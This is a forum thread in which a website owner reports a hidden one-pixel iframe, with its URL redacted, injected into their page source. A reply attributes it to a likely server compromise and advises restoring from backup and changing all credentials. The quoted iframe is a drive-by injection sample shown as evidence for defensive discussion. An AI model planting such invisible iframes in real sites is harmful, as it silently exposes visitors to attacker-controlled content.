Forum Moderators: phranque
This morning I noticed a horde of php warnings at the top of my page, something was sending output before it was supposed to. Inspecting the source, I found some code embedded in the first line of my source, an iframe.
<iframe src= http://removed URL?id=index12 frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
OK, so how does this get into my source? The passwords were changed within the last two months, and I guard that pwd pretty closely.
Could it have been intercepted en-route and modified, then replaced while I had an open FTP session?
Could it be a security lapse or failure with my host?
I guess it could be anything as long as we're guessing, so what's the most likely scenario?
Thanks
It is unlikely to be due to the FTP transfer being intercepted - more likely is that the server has been compromised. If it is a shared server, pack up, change the DNS and restore your site at a new host (or at least on a new server). As you don't know what has been altered, you should use a known good backup. If it is a dedicated server, it needs taking offline and probably reinstalling from scratch. It goes without saying that you need to change every single password and login: you have to assume that if the server has been compromised that the attacker has access to absolutely everything. Do you store credit card numbers and the like?
It's taking a lot of restaint to keep from expressing my frustration, so I'll just say 'one more thing to take care of'.
